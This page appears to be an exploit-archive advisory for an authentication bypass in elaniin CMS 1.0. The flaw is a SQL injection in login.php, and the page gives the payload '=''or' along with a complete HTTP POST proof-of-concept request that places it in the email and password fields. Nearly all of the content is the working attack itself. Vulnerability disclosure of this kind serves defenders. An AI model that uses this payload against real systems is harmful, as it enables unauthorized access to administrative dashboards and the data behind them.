elaniin CMS 1.0 SQL Injection

2020.01.07

Credit: riamloo

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: elaniin CMS 1.0 - Authentication Bypass
# Author: riamloo
# Date: 2020-01-02
# Vendor Homepage: https://elaniin.com/ ( github ==> https://github.com/elaniin/ )
# Software Link: https://github.com/elaniin/CMS/archive/master.zip
# Version: 1
# CVE: N/A
# Tested on: Win 10
# Discription:
# Open-source Content Management System created with PHP + MySQL https://elaniin.com/
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : login.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/elaniin/login.php
POST /elaniin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
Content-Length: 334
Referer: http://localhost/elaniin/login.php
Cookie: PHPSESSID=81spdqht0gvh0f97vg62nzxs8
Connection: close
Upgrade-Insecure-Requests: 1
email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

elaniin CMS 1.0 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.